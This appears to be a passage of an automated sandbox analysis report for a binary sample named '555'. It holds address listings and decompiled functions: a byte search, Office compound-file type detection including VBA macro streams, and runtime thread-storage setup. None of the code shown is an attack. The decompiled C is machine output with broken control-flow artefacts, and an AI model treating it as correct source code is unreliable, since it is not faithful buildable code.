0x0042fb98
0x0042fb98
0x0042fb9e
0x0042fc09
0x0042fc0b
0x0042fc0d
0x00000000
0x00000000
0x0042fc0f
0x0042fc15
0x0042fc8c
0x0042fc8e
0x0042fc90
0x00000000
0x00000000
0x0042fc96
0x0042fc9c
0x0042fd13
0x0042fd15
0x0042fd17
0x00000000
0x00000000
0x0042fd1d
0x0042fd23
0x0042fd9a
0x0042fd9c
0x0042fd9e
0x00000000
0x00000000
0x0042fdaa
0x0042fe22
0x0042fe24
0x0042fe26
0x00000000
0x00000000
0x0042fe2c
0x0042fe32
0x0042fea9
0x0042feab
0x0042fead
0x00000000
0x00000000
0x0042feb3
0x0042feb9
0x0042ff28
0x0042ff2a
0x0042ff2c
0x0042ff2e
0x0042ff2e
0x0042ff30
0x00430bd4
0x00430bd4
0x0042fec2
0x0042fec4
0x0042fed5
0x0042fedd
0x0042fedf
0x0042fef0
0x0042fef8
0x0042fefa
0x0042ff0f
0x0042ff17
0x0042ff19
0x0042ff22
0x0042ff22
0x0042ff22
0x00000000
0x0042ff19
0x0042ff03
0x0042ff09
0x00000000
0x00000000
0x0042ff0b
0x0042ff0b
0x00000000
0x0042ff0b
0x0042fee8
0x0042feee
0x00000000
0x00000000
0x00000000
0x0042feee
0x0042fecd
0x0042fed3
0x00000000
0x00000000
0x00000000
0x0042fed3
0x0042fe3b
0x0042fe3d
0x0042fe52
0x0042fe5a
0x0042fe5c
0x0042fe71
0x0042fe79
0x0042fe7b
0x0042fe90
0x0042fe98
0x0042fe9a
0x0042fea3
0x0042fea3
0x0042fea3
0x00000000
0x0042fe9a
0x0042fe84
0x0042fe84
0x0042fe8a
0x00000000
0x00000000
0x00000000
0x0042fe8a
0x0042fe65
0x0042fe65
0x0042fe6b
0x00000000
0x00000000
0x00000000
0x0042fe6b
0x0042fe46
0x0042fe46
0x0042fe4c
0x00000000
0x00000000
0x00000000
0x0042fe4c
0x0042fdb4
0x0042fdb6
0x0042fdcb
0x0042fdd3
0x0042fdd5
0x0042fdea
0x0042fdf2
0x0042fdf4
0x0042fe09
0x0042fe11
0x0042fe13
0x0042fe1c
0x0042fe1c
0x0042fe1c
0x00000000
0x0042fe13
0x0042fdfd
0x0042fdfd
0x0042fe03
0x00000000
0x00000000
0x00000000
0x0042fe03
0x0042fdde
0x0042fdde
0x0042fde4
0x00000000
0x00000000
0x00000000
0x0042fde4
0x0042fdbf
0x0042fdbf
0x0042fdc5
0x00000000
0x00000000
0x00000000
0x0042fdc5
0x0042fd2c
0x0042fd2e
0x0042fd43
0x0042fd4b
0x0042fd4d
0x0042fd62
0x0042fd6a
0x0042fd6c
0x0042fd81
0x0042fd89
0x0042fd8b
0x0042fd94
0x0042fd94
0x0042fd94
0x00000000
0x0042fd8b
0x0042fd75
0x0042fd75
0x0042fd7b
0x00000000
0x00000000
0x00000000
0x0042fd7b
0x0042fd56
0x0042fd56
0x0042fd5c
0x00000000
0x00000000
0x00000000
0x0042fd5c
0x0042fd37
0x0042fd37
0x0042fd3d
0x00000000
0x00000000
0x00000000
0x0042fd3d
0x0042fca5
0x0042fca7
0x0042fcbc
0x0042fcc4
0x0042fcc6
0x0042fcdb
0x0042fce3
0x0042fce5
0x0042fcfa
0x0042fd02
0x0042fd04
0x0042fd0d
0x0042fd0d
0x0042fd0d
0x00000000
0x0042fd04
0x0042fcee
0x0042fcee
0x0042fcf4
0x00000000
0x00000000
0x00000000
0x0042fcf4
0x0042fccf
0x0042fccf
0x0042fcd5
0x00000000
0x00000000
0x00000000
0x0042fcd5
0x0042fcb0
0x0042fcb0
0x0042fcb6
0x00000000
0x00000000
0x00000000
0x0042fcb6
0x0042fc1e
0x0042fc20
0x0042fc35
0x0042fc3d
0x0042fc3f
0x0042fc54
0x0042fc5c
0x0042fc5e
0x0042fc73
0x0042fc7b
0x0042fc7d
0x0042fc86
0x0042fc86
0x0042fc86
0x00000000
0x0042fc7d
0x0042fc67
0x0042fc67
0x0042fc6d
0x00000000
0x00000000
0x00000000
0x0042fc6d
0x0042fc48
0x0042fc48
0x0042fc4e
0x00000000
0x00000000
0x00000000
0x0042fc4e
0x0042fc29
0x0042fc29
0x0042fc2f
0x00000000
0x00000000
0x00000000
0x0042fba0
0x0042fba0
0x0042fba3
0x0042fba7
0x0042fba9
0x0042fbba
0x0042fbba
0x0042fbbe
0x0042fbc2
0x0042fbc4
0x0042fbd5
0x0042fbd5
0x0042fbd9
0x0042fbdd
0x0042fbdf
0x0042fbf0
0x0042fbf0
0x0042fbf4
0x0042fbf8
0x0042fbfa
0x0042fbfc
0x0042fc03
0x0042fc03
0x0042fc03
0x00000000
0x0042fbfa
0x0042fbe1
0x0042fbe5
0x0042fbe8
0x0042fbe8
0x0042fbee
0x00000000
0x00000000
0x00000000
0x0042fbee
0x0042fbc6
0x0042fbca
0x0042fbcd
0x0042fbcd
0x0042fbd3
0x00000000
0x00000000
0x00000000
0x0042fbd3
0x0042fbab
0x0042fbaf
0x0042fbb2
0x0042fbb2
0x0042fbb8
0x00000000
0x00000000
0x00000000
0x0042fbb8
0x0042fb91
0x0042fb91
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 3ea6a207afc3743420fd9abfc76f27b319fa681a89dd6febc3e214799d3d550e
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 1BB19533E1A5B3058736412D652823BEF726E91B4139FC3B6DCD03F78AC62A6D0995D8

Uniqueness

Uniqueness Score: -1.00%

Function 00423130 Relevance: .1, Instructions: 76
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00423130(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x00423130
0x00423137
0x0042318c
0x0042318c
0x00423139
0x00423139
0x0042313f
0x00423149
0x00423161
0x00423161
0x00423164
0x00423178
0x00423178
0x0042317b
0x00000000
0x0042317d
0x0042317d
0x0042317d
0x0042317f
0x00423184
0x00000000
0x00000000
0x00423186
0x00423189
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423189
0x00000000
0x0042317d
0x00423166
0x00423173
0x00423192
0x00423194
0x004231a2
0x004231ab
0x00000000
0x004231ad
0x004231b0
0x004231b2
0x004231dc
0x004231b4
0x004231b4
0x004231b6
0x004231d6
0x004231b8
0x004231bb
0x004231bd
0x004231d0
0x004231bf
0x004231c1
0x00000000
0x004231c3
0x00000000
0x004231c3
0x004231c1
0x004231bd
0x004231b6
0x004231b2
0x00000000
0x0042318d
0x0042318d
0x0042318d
0x00000000
0x00423177
0x0042314b
0x0042314b
0x0042314b
0x0042314d
0x00423152
0x00000000
0x00000000
0x00423154
0x00423157
0x00000000
0x00423159
0x0042315f
0x00000000
0x00000000
0x00000000
0x00000000
0x0042315f
0x00000000
0x00423157
0x004231c6
0x004231ca
0x004231ca
0x00423149
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9ce78796c78b9c2a7002388393dc59ccbb59dc68ed9e218395bb5d2a24d7c783
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 9511E6773001B153E6048E2DF8B45B7A3B5EEC6323BAC837BD0418B758D22EAB65950C

Uniqueness

Uniqueness Score: -1.00%

Function 04771560 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.291392046.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4770000_555.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040F070 Relevance: 42.4, APIs: 3, Strings: 21, Instructions: 432
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040F070(intOrPtr __ecx, intOrPtr _a4, char _a8, char _a36) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				char _v104;
				char _v132;
				char _v160;
				char _v188;
				char _v216;
				signed int _v220;
				signed int _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				intOrPtr _t198;
				intOrPtr _t200;
				signed char _t202;
				signed char _t205;
				signed char _t206;
				signed char _t208;
				signed char _t209;
				void* _t223;
				signed char _t228;
				signed char _t229;
				signed char _t230;
				signed char _t231;
				signed char _t232;
				signed char _t273;
				intOrPtr _t274;
				signed char _t281;
				void* _t285;
				void* _t377;
				void* _t404;
				void* _t405;
				intOrPtr _t406;
				void* _t408;
				void* _t409;
				void* _t420;
				void* _t421;
				void* _t423;
				void* _t434;

				_push(0xffffffff);
				_push(E0044E5ED);
				 *[fs:0x0] = _t406;
				_v240 = __ecx;
				_v8 = 1;
				_t198 = E00422C34(_t377, _t404, _t405, _t423, 1,  *[fs:0x0]);
				_t408 = _t406 - 0x12c + 4;
				_v40 = _t198;
				_v8 = 2;
				_t424 = _v40;
				if(_v40 == 0) {
					_v244 = 0;
				} else {
					_v244 = E00412350(_v40);
				}
				_v36 = _v244;
				_v8 = 1;
				_v20 = _v36;
				_push(0x40);
				_t200 = E00422C34(_t377, _t404, _t405, _t424);
				_t409 = _t408 + 4;
				_v48 = _t200;
				_v8 = 3;
				if(_v48 == 0) {
					_v248 = 0;
				} else {
					_v248 = E0040F6C0(_v48);
				}
				_v44 = _v248;
				_v8 = 1;
				_v24 = _v44;
				_t202 = E00417310(_a4,  &_a36);
				_t379 = _t202 & 0x000000ff;
				if((_t202 & 0x000000ff) == 0) {
					_push(4);
					_v76 = E00422C34(_t379, _t404, _t405, __eflags);
					_v8 = 5;
					__eflags = _v76;
					if(_v76 == 0) {
						_v268 = 0;
					} else {
						_push(0);
						_v268 = E00417360(_v76,  &_a36, _a4,  &_a36, 0, 0);
					}
					_v72 = _v268;
					_v8 = 1;
					_v32 = _v72;
					_t205 = E00411DA0( &_a36, "/\tDRMContent");
					__eflags = _t205 & 0x000000ff;
					if((_t205 & 0x000000ff) == 0) {
						_t206 = E00411DA0( &_a36, "/PowerPoint Document");
						__eflags = _t206 & 0x000000ff;
						if((_t206 & 0x000000ff) == 0) {
							_t208 = E00411DA0( &_a36, "/PP40");
							__eflags = _t208 & 0x000000ff;
							if((_t208 & 0x000000ff) == 0) {
								_t383 =  &_a36;
								_t209 = E00411DA0( &_a36, "/Workbook");
								__eflags = _t209 & 0x000000ff;
								if((_t209 & 0x000000ff) != 0) {
									L28:
									E004100F0(_v24 + 4, ".xls");
									 *(_v24 + 0x20) = E0041D3E0(_v20, _t383, _t404, _t405, _v32);
									_v280 = E0041D430(_v20,  &_v132,  *(_v24 + 0x20) & 0x0000ffff);
									_v284 = _v280;
									_v8 = 7;
									E004100C0(_v24 + 0x24, _v284);
									_v8 = 1;
									E004034C0( &_v132);
									goto L37;
								}
								_t228 = E00411DA0( &_a36, "/Book");
								_t383 = _t228 & 0x000000ff;
								__eflags = _t228 & 0x000000ff;
								if((_t228 & 0x000000ff) == 0) {
									_t229 = E00411DA0( &_a36, "/WordDocument");
									_t388 = _t229 & 0x000000ff;
									__eflags = _t229 & 0x000000ff;
									if(__eflags == 0) {
										_t230 = E00411DA0( &_a36, "/Contents");
										_t389 = _t230 & 0x000000ff;
										__eflags = _t230 & 0x000000ff;
										if(__eflags == 0) {
											_t231 = E00411DA0( &_a36, "/VisioDocument");
											_t390 = _t231 & 0x000000ff;
											__eflags = _t231 & 0x000000ff;
											if((_t231 & 0x000000ff) == 0) {
												_t232 = E00411DA0( &_a36, "/Details");
												__eflags = _t232 & 0x000000ff;
												if((_t232 & 0x000000ff) != 0) {
													__eflags = _v24 + 4;
													E004100F0(_v24 + 4, ".bup");
												}
											} else {
												E004100F0(_v24 + 4, ".vsd");
												 *(_v24 + 0x20) = E0041DCB0(_v20, _t390, _t404, _t405, _v32);
												_v304 = E0041DD00(_v20,  &_v216,  *(_v24 + 0x20) & 0x0000ffff);
												_v308 = _v304;
												_v8 = 0xa;
												E004100C0(_v24 + 0x24, _v308);
												_v8 = 1;
												E004034C0( &_v216);
											}
										} else {
											E004100F0(_v24 + 4, ".pub");
											 *(_v24 + 0x20) = E0041DB50(_v20, _t389, _t404, _t405, __eflags, _v32);
											_v296 = E0041DBB0(_v20,  &_v188,  *(_v24 + 0x20) & 0x0000ffff);
											_v300 = _v296;
											_v8 = 9;
											E004100C0(_v24 + 0x24, _v300);
											_v8 = 1;
											E004034C0( &_v188);
										}
									} else {
										E004100F0(_v24 + 4, ".doc");
										 *(_v24 + 0x20) = E0041D0B0(_v20, _t388, _t404, _t405, __eflags, _v32);
										_v288 = E0041D150(_v20,  &_v160,  *(_v24 + 0x20) & 0x0000ffff);
										_v292 = _v288;
										_v8 = 8;
										E004100C0(_v24 + 0x24, _v292);
										_v8 = 1;
										E004034C0( &_v160);
									}
									goto L37;
								}
								goto L28;
							}
							E004100F0(_v24 + 4, ".ppt");
							 *(_v24 + 0x20) = 4;
							E004100F0(_v24 + 0x24, "PowerPoint 4.0");
							goto L37;
						}
						E004100F0(_v24 + 4, ".ppt");
						 *(_v24 + 0x20) = E0041D4E0(_v20, _t404, _t405, _a4, _v32);
						_v272 = E0041D670(_v20, __eflags,  &_v104,  *(_v24 + 0x20) & 0x0000ffff);
						_v276 = _v272;
						_v8 = 6;
						E004100C0(_v24 + 0x24, _v276);
						_v8 = 1;
						E004034C0( &_v104);
						goto L37;
					} else {
						E004100F0(_v24 + 4, ".irm");
						E004100F0(_v24 + 0x24, "Information Rights Managed file (drm)");
						L37:
						_v224 = _v32;
						_v220 = _v224;
						__eflags = _v220;
						if(_v220 == 0) {
							_v312 = 0;
						} else {
							_v312 = E0040FBC0(_v220, 1);
						}
						goto L40;
					}
				} else {
					_t273 = E00411DA0( &_a8, "Macros");
					_t420 = _t409 + 8;
					if((_t273 & 0x000000ff) != 0) {
						L9:
						_push(1);
						_t274 = E00422C34(_t379, _t404, _t405, _t428);
						_t421 = _t420 + 4;
						_v56 = _t274;
						_v8 = 4;
						if(_v56 == 0) {
							_v252 = 0;
						} else {
							_v252 = E00412350(_v56);
						}
						_v52 = _v252;
						_v8 = 1;
						_v28 = _v52;
						_v64 = _v24;
						_v60 = _v64;
						_t430 = _v60;
						if(_v60 == 0) {
							_v256 = 0;
						} else {
							_v256 = E0040FB40(_v60, _t430, 1);
						}
						_push(_a4);
						_v68 = _t421 - 0x1c;
						_v260 = E00404800(_t421 - 0x1c,  &_a36);
						_v264 = E0041E4F0(_t285, _v28, _t404, _t405, _t434);
						_v24 = _v264;
						L16:
						L40:
						if((E00410110(_v24 + 4) & 0x000000ff) == 0) {
							_v228 = _v24;
							E00410880(_v240 + 4,  &_v228);
						}
						_v236 = _v20;
						_v232 = _v236;
						if(_v232 == 0) {
							_v316 = 0;
						} else {
							_v316 = E0040FBF0(_v232, 1);
						}
						_v8 = 0;
						E004034C0( &_a8);
						_v8 = 0xffffffff;
						_t223 = E004034C0( &_a36);
						 *[fs:0x0] = _v16;
						return _t223;
					}
					_t379 =  &_a8;
					_t281 = E00411DA0( &_a8, "_VBA_PROJECT_CUR");
					_t420 = _t420 + 8;
					_t428 = _t281 & 0x000000ff;
					if((_t281 & 0x000000ff) == 0) {
						goto L16;
					}
					goto L9;
				}
			}

0x0040f073
0x0040f075
0x0040f081
0x0040f08e
0x0040f094
0x0040f09d
0x0040f0a2
0x0040f0a5
0x0040f0a8
0x0040f0ac
0x0040f0b0
0x0040f0c2
0x0040f0b2
0x0040f0ba
0x0040f0ba
0x0040f0d2
0x0040f0d5
0x0040f0dc
0x0040f0df
0x0040f0e1
0x0040f0e6
0x0040f0e9
0x0040f0ec
0x0040f0f4
0x0040f106
0x0040f0f6
0x0040f0fe
0x0040f0fe
0x0040f116
0x0040f119
0x0040f120
0x0040f12a
0x0040f12f
0x0040f134
0x0040f217
0x0040f221
0x0040f224
0x0040f228
0x0040f22c
0x0040f24c
0x0040f22e
0x0040f22e
0x0040f244
0x0040f244
0x0040f25c
0x0040f25f
0x0040f266
0x0040f272
0x0040f27d
0x0040f27f
0x0040f2af
0x0040f2ba
0x0040f2bc
0x0040f33b
0x0040f346
0x0040f348
0x0040f380
0x0040f384
0x0040f38f
0x0040f391
0x0040f3ab
0x0040f3b6
0x0040f3ca
0x0040f3e2
0x0040f3ee
0x0040f3f4
0x0040f405
0x0040f40a
0x0040f411
0x00000000
0x0040f411
0x0040f39c
0x0040f3a4
0x0040f3a7
0x0040f3a9
0x0040f424
0x0040f42c
0x0040f42f
0x0040f431
0x0040f4b2
0x0040f4ba
0x0040f4bd
0x0040f4bf
0x0040f540
0x0040f548
0x0040f54b
0x0040f54d
0x0040f5cb
0x0040f5d6
0x0040f5d8
0x0040f5e2
0x0040f5e5
0x0040f5e5
0x0040f54f
0x0040f55a
0x0040f56e
0x0040f589
0x0040f595
0x0040f59b
0x0040f5ac
0x0040f5b1
0x0040f5bb
0x0040f5bb
0x0040f4c1
0x0040f4cc
0x0040f4e0
0x0040f4fb
0x0040f507
0x0040f50d
0x0040f51e
0x0040f523
0x0040f52d
0x0040f52d
0x0040f433
0x0040f43e
0x0040f452
0x0040f46d
0x0040f479
0x0040f47f
0x0040f490
0x0040f495
0x0040f49f
0x0040f49f
0x00000000
0x0040f431
0x00000000
0x0040f3a9
0x0040f355
0x0040f362
0x0040f371
0x00000000
0x0040f371
0x0040f2c9
0x0040f2e1
0x0040f2f9
0x0040f305
0x0040f30b
0x0040f31c
0x0040f321
0x0040f328
0x00000000
0x0040f281
0x0040f28c
0x0040f29c
0x0040f5ea
0x0040f5ed
0x0040f5f9
0x0040f5ff
0x0040f606
0x0040f61d
0x0040f608
0x0040f615
0x0040f615
0x00000000
0x0040f606
0x0040f13a
0x0040f143
0x0040f148
0x0040f150
0x0040f16e
0x0040f16e
0x0040f170
0x0040f175
0x0040f178
0x0040f17b
0x0040f183
0x0040f195
0x0040f185
0x0040f18d
0x0040f18d
0x0040f1a5
0x0040f1a8
0x0040f1af
0x0040f1b5
0x0040f1bb
0x0040f1be
0x0040f1c2
0x0040f1d6
0x0040f1c4
0x0040f1ce
0x0040f1ce
0x0040f1e3
0x0040f1e9
0x0040f1f5
0x0040f203
0x0040f20f
0x0040f212
0x0040f627
0x0040f637
0x0040f63c
0x0040f652
0x0040f652
0x0040f65a
0x0040f666
0x0040f673
0x0040f68a
0x0040f675
0x0040f682
0x0040f682
0x0040f694
0x0040f69b
0x0040f6a0
0x0040f6aa
0x0040f6b2
0x0040f6bc
0x0040f6bc
0x0040f157
0x0040f15b
0x0040f160
0x0040f166
0x0040f168
0x00000000
0x00000000
0x00000000
0x0040f168

APIs

Part of subcall function 00422C34: _malloc.LIBCMT ref: 00422C4E

codecvt.LIBCPMTD ref: 0040F1C9

Part of subcall function 00422C34: std::exception::exception.LIBCMT ref: 00422C83
Part of subcall function 00422C34: std::exception::exception.LIBCMT ref: 00422C9D
Part of subcall function 00422C34: __CxxThrowException@8.LIBCMT ref: 00422CAE

codecvt.LIBCPMTD ref: 0040F610
codecvt.LIBCPMTD ref: 0040F67D

Part of subcall function 0041D4E0: codecvt.LIBCPMTD ref: 0041D605

Strings

Macros, xrefs: 0040F13A
.vsd, xrefs: 0040F54F
/WordDocument, xrefs: 0040F41B
Information Rights Managed file (drm), xrefs: 0040F291
/Workbook, xrefs: 0040F37B
/Contents, xrefs: 0040F4A9
.ppt, xrefs: 0040F34A
_VBA_PROJECT_CUR, xrefs: 0040F152
/Details, xrefs: 0040F5C2
/PowerPoint Document, xrefs: 0040F2A6
.irm, xrefs: 0040F281
.bup, xrefs: 0040F5DA
/PP40, xrefs: 0040F332
/DRMContent, xrefs: 0040F269
PowerPoint 4.0, xrefs: 0040F366
/Book, xrefs: 0040F393
.ppt, xrefs: 0040F2BE
.pub, xrefs: 0040F4C1
/VisioDocument, xrefs: 0040F537
.xls, xrefs: 0040F3AB
.doc, xrefs: 0040F433

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: codecvt$std::exception::exception$Exception@8Throw_malloc
String ID: .bup$.doc$.irm$.ppt$.ppt$.pub$.vsd$.xls$/DRMContent$/Book$/Contents$/Details$/PP40$/PowerPoint Document$/VisioDocument$/WordDocument$/Workbook$Information Rights Managed file (drm)$Macros$PowerPoint 4.0$_VBA_PROJECT_CUR
API String ID: 2580320625-937666240
Opcode ID: b1617290e276c170d343493dbd224b6199998fe241cd2683426bc5960f20e14f
Instruction ID: d25313359961ad5de4e9279319d64782729f91ec18f538fa4a695534d850080c
Opcode Fuzzy Hash: b1617290e276c170d343493dbd224b6199998fe241cd2683426bc5960f20e14f
Instruction Fuzzy Hash: 05029170D00119DBCB18DF95D851BEEB7B1BF48308F1441AEE50A7B282DB799E84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00428133 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00428133(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x463838 = GetProcAddress(_t35, "FlsAlloc");
					 *0x46383c = GetProcAddress(_t35, "FlsGetValue");
					 *0x463840 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x463838;
					_t39 = TlsSetValue;
					 *0x463844 = _t7;
					if( *0x463838 == 0) {
						L6:
						 *0x46383c = TlsGetValue;
						 *0x463838 = E00427E43;
						 *0x463840 = _t39;
						 *0x463844 = TlsFree;
					} else {
						__eflags =  *0x46383c;
						if( *0x46383c == 0) {
							goto L6;
						} else {
							__eflags =  *0x463840;
							if( *0x463840 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x460dc4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x46383c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00429F56();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x463838);
							 *0x463838 = _t14;
							_t15 =  *_t41( *0x46383c);
							 *0x46383c = _t15;
							_t16 =  *_t41( *0x463840);
							 *0x463840 = _t16;
							 *0x463844 =  *_t41( *0x463844);
							_t18 = E0042BC1A();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00427E80();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x463838, E00428004);
								 *0x460dc0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00425539(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x463840,  *0x460dc0, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00427EBD(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00427E80();
					return 0;
				}
			}

0x00428133
0x00428141
0x00428145
0x00428165
0x00428172
0x0042817f
0x00428184
0x00428186
0x0042818d
0x00428193
0x00428198
0x004281b0
0x004281b5
0x004281bf
0x004281c9
0x004281cf
0x0042819a
0x0042819a
0x004281a1
0x00000000
0x004281a3
0x004281a3
0x004281aa
0x00000000
0x004281ac
0x004281ac
0x004281ae
0x00000000
0x00000000
0x004281ae
0x004281aa
0x004281a1
0x004281d4
0x004281da
0x004281df
0x004281e2
0x004282a9
0x004282a9
0x004282a9
0x004281e8
0x004281ef
0x004281f1
0x004281f3
0x00000000
0x004281f9
0x004281f9
0x00428204
0x0042820a
0x00428212
0x00428217
0x0042821f
0x00428224
0x0042822c
0x00428233
0x00428238
0x0042823d
0x0042823f
0x004282a4
0x004282a4
0x00000000
0x00428241
0x00428241
0x00428254
0x00428256
0x0042825b
0x0042825e
0x00000000
0x00428260
0x0042826c
0x00428270
0x00428272
0x00000000
0x00428274
0x00428285
0x00428287
0x00000000
0x00428289
0x00428289
0x0042828b
0x0042828c
0x00428293
